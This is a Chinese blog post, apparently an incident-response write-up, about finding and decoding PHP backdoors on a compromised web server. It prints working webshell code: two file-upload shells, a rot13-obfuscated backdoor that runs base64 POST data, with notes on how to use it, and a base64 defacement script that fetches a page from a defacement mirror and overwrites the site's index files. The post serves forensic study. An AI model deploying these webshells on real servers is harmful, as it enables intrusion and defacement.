源于昨晚国外无法访问某域名,经排查:
1、服务器IP登录Ojbk
2、外网访问正常,国内无法访问,怀疑是被墙,
3、绑定其他域名到本iP,访问正常;将本域名子域绑定本IP无法访问;但是,不加cdn的情况下,能正常访问
4、前段时间有平台发来的后门文件提醒,但没有留意,以为是个人调试的遗留文件;登录看了下
登录服务器,利用chkrootkit和河马后门查杀,以及
find ./ -name “*.php”
查看发现以下后门
下载到本地,D盾了下:
下面一个个查下:
1、
对数组中的字符进行解码:
或者:
#coding:utf-8
import gmpy2
import libnum
str = 0x66696c655f6765745f636f6e74656e7473
print libnum.n2s(str)
运行是一个大马:
2、K17.phtml
来源:https://github.com/bartblaze/PHP-backdoors/blob/master/Deobfuscated/k2ll33dShell_5a93b50b370effd9299866578426c5cb9ca161c7.php
3、x.php5
里面内容很多…..
PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo
<?php
$def = file_get_contents('http://zonehmirrors.org/defaced/2013/03/19/associapress.net');
$p = explode('public_html',dirname(__FILE__));
$p = $p[0].'public_html';
if ($handle = opendir($p)) {
$fp1 = @fopen($p.'/index.html','w+');
@fwrite($fp1, $def);
$fp1 = @fopen($p.'/index.php','w+');
@fwrite($fp1, $def);
$fp1 = @fopen($p.'/index.htm','w+');
@fwrite($fp1, $def);
echo 'Done';
}
closedir($handle);
unlink(__FILE__);DQo
http://zonehmirrors.org/defaced/2013/03/19/associapress.net/为黑页:
在zone-h查到:
4、functions.php.bak
里面存在明显的后门:
5、210.php
if(isset($_POST['submit'])){ if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']))
{echo'OK';}else{echo'Not';}}echo'<form enctype="multipart/form-data" method="post"><input type="file" name="file"><input type="submit" name="submit" value="ucCI
6、556.php:
<?php print_r(base64_decode('U0gzTExGMFVORA==')); if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo"Y";}else{echo"N";}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>
关键字SH3LLF0UND,同U0gzTExGMFVORA==解码一致,搜索引擎走一波:
https://ctf.pediy.com/team-myctf-100029.htm
7、683.php
<?php
$r='str'.'_'.'ro';$r.='t13';if(!empty(${$r('_CB'.'FG')})){
$m=$r('zq'.'5');$b=$r('onfr64_'.'qrpbqr');$f=$r('per'.'ngr_shapgvba');
foreach(${$r('_C'.'BFG')}as$k=>$v)($m($k)==='c42ea979'.'ed982c0263243'
.'0e9e98a66d6'&&$ff=$f('',$b($v)))?$ff():'';}整理下:
<?php
if(!empty($ {_POST})) {
foreach($ {_POST} as $k=>$v)
( md5($k)==='1a1dc91c907325c69271ddf0c944bc72'&&$ff=create_function('',base64_decode($v)) )?$ff():'';
}
利用方法:$k为参数名 $v为参数值
![[域名转移] Godaddy转移到其他 - vulsee.com-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2024/05/819ab046462d9fab481424476ad89591.png)
![[vul see] linux 安装wpscan-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2024/05/4e530c01b4399de149874f2a2011eafe.png)
![[测试]WEB日志审计工具 teler-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2024/03/695a48b0bc02a11b7d41de2b76f6a7f9.png)
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
